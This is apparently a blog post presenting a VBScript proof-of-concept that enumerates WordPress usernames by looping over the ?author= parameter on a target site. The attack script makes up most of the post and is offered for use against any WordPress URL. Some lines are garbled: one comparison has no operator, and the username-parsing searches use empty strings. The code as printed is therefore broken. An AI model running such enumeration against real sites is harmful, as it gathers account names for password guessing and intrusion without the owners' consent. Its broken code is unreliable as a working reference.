WordPress UserId & Username Enumeration Exploit/PoC Script

Simple VBScript using XMLHTTP to fetch usernames from a WordPress installation using the ?author= redirect feature.

Background

On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a /?author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.

PoC using VBScript

'Author: karniv0re@null.co.in
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by 
'querying the value of the parameter 'author' using xmlHTTP.

Dim url, sQuery, args, i, max

if wscript.arguments.count < 1 then
    wscript.echo "WPEnum – WordPress User Enumeration Script"
    wscript.echo "Author: karniv0re@null.co.in"
    wscript.echo "Insufficient Parameters."
    wscript.echo
    wscript.echo "cscript WPEnum.vbs []"
    wscript.echo ": A WordPress based website in the form of http://example.com/"
    wscript.echo ":[Optional] Maximum number of users. Default 20."
    wscript.echo "Example: cscript WPEnum.vbs http://example.com/ 10"
    wscript.echo
    wscript.quit
End if

set args = wscript.Arguments

wscript.echo "WPEnum – WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo
wscript.echo "Enumerating ..."
wscript.echo

i=0
max=20
url = args(0)
if right(url,1) "/" then
    url = url & "/"
End if

if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
    max=args(1)
End if

Set xmlHTTP = Nothing
set xmlHTTP = CreateObject("Microsoft.XmlHttp")

For i=1 to max
    sQuery = args(0) & "?author=" & i
    xmlHTTP.open "GET", sQuery, false
    xmlHTTP.send ""

    wscript.sleep 70

    do while not xmlHTTP.readyState=4
    Loop

    if xmlHTTP.status = 404 then
        wscript.echo
        i=i-1
        wscript.echo i & " users enumerated."
        wscript.echo "Done!"
        Set xmlHTTP = Nothing
        wscript. quit
    End if

    wscript.echo "Userid:" & i

    k = Instr(Lcase(xmlHTTP.responseText),"")
    j = Instr(Lcase(xmlHTTP.responseText),"")
    username = Mid(xmlHTTP.responseText, k+7, j-k-7)
    wscript.echo username
    wscript.echo
Next

wscript.echo i & " users enumerated."
wscript.echo "Done!"

Set xmlHTTP = Nothing

'End of program